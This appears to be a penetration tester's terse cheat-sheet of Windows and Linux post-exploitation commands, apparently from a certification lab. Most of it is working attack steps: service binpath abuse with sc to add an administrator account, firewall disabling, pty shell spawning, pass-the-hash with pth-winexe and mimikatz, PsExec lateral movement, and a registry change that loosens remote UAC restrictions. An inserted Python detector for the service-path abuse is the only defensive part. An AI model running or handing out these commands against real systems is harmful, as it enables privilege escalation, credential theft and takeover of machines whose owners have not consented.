messy security notes
keepnote
Last updated 3 years ago
File transfer:

Winpriv check:

Local Privilege Escalation Abusing a Misconfigured Service (upnphost):

accesschk.exe -uwcqv "Authenticated Users" /accepteula
accesschk-xp.exe -uwcqv "Authenticated Users" /accepteula

accesschk.exe -ucqv upnphost
sc config upnphost depend= ""
sc config upnphost binpath= "net user testxlab Password1 /add"
sc config upnphost binpath= "net localgroup Administrators testxlab /add"

sc stop upnphost
sc start upnphost
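A detection-side counterpart to the service abuse above, added here as an example and not part of the original notes: it scans constructed, simplified event records (Sysmon event 13 registry value set, Security event 4720 user account created, Security event 4732 member added to a local group; the flat record layout is an assumption) for a service ImagePath rewritten to a shell command, which is exactly what the sc config binpath= lines produce, and correlates the account-creation and group-change events that follow.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (simplified flat records, not real exported logs).
# Sysmon EID 13 = registry value set; Security EID 4720 = user created,
# EID 4732 = member added to a security-enabled local group.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:01", "source": "Sysmon", "id": 13,
     "target": r"HKLM\System\CurrentControlSet\Services\upnphost\ImagePath",
     "details": "net user testxlab Password1 /add"},
    {"time": "2024-01-10T09:00:05", "source": "Security", "id": 4720,
     "target": "testxlab", "details": "user account created"},
    {"time": "2024-01-10T09:00:20", "source": "Sysmon", "id": 13,
     "target": r"HKLM\System\CurrentControlSet\Services\upnphost\ImagePath",
     "details": "net localgroup Administrators testxlab /add"},
    {"time": "2024-01-10T09:00:30", "source": "Security", "id": 4732,
     "target": "Administrators", "details": "member testxlab added"},
    {"time": "2024-01-10T10:00:00", "source": "Sysmon", "id": 13,
     "target": r"HKLM\System\CurrentControlSet\Services\Spooler\ImagePath",
     "details": r"C:\Windows\System32\spoolsv.exe"},
]

IMAGEPATH_RE = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.I)
# A service binary path should point at an executable, not at a shell command.
SUSPICIOUS_CMD_RE = re.compile(
    r"\b(net1?\s+(user|localgroup)|cmd\.exe|powershell)\b", re.I)


def _ts(s):
    return datetime.fromisoformat(s)


def find_service_binpath_abuse(events, window=timedelta(minutes=5)):
    """Return one alert per ImagePath rewrite to a command line, enriched with
    the IDs of 4720/4732 Security events that follow within `window`."""
    alerts = []
    for ev in events:
        if ev["source"] != "Sysmon" or ev["id"] != 13:
            continue
        m = IMAGEPATH_RE.search(ev["target"])
        if not m or not SUSPICIOUS_CMD_RE.search(ev["details"]):
            continue
        t0 = _ts(ev["time"])
        followups = [e["id"] for e in events
                     if e["source"] == "Security" and e["id"] in (4720, 4732)
                     and t0 <= _ts(e["time"]) <= t0 + window]
        alerts.append({"service": m.group("svc"), "command": ev["details"],
                       "followup_ids": followups})
    return alerts
```

Running find_service_binpath_abuse(SAMPLE_EVENTS) flags the two upnphost rewrites and ignores the legitimate spoolsv.exe path.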

File Transfer via FTP

ftp> binary

ftp> put /root/Downloads/accesschk.exe accesschk.exe

Python Interactive Shell (pty spawn):

python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'

Disable Windows firewall on newer versions: NetSh Advfirewall set allprofiles state off

Disable Windows firewall on older Windows versions: netsh firewall set opmode disable

References

PtH

pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe

Via Sysinternals tools and mimikatz:

  • PtH: first get the user's NTLM hash (via RDP, MSF or other means).

mimikatz# privilege::debug
mimikatz# sekurlsa::minidump FILE.DMP
mimikatz# sekurlsa::logonpasswords
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}

Then open a new cmd; from there you can run commands via PsExec.

windows> PsExec.exe \\{IP} cmd

Tip: General usage with password:

PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd

If you get the "Couldn't access otherComputer: Access is denied." error:

run the following command on the target system:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

cadaver

priv esc linux - hackingarticles (abuse PATH variable)

priv esc - cronjob

priv esc - windows - services - sc

http://10.11.1.14/
https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/
https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat
Transferring Files from Linux to Windows (post-exploitation) - ropnop blog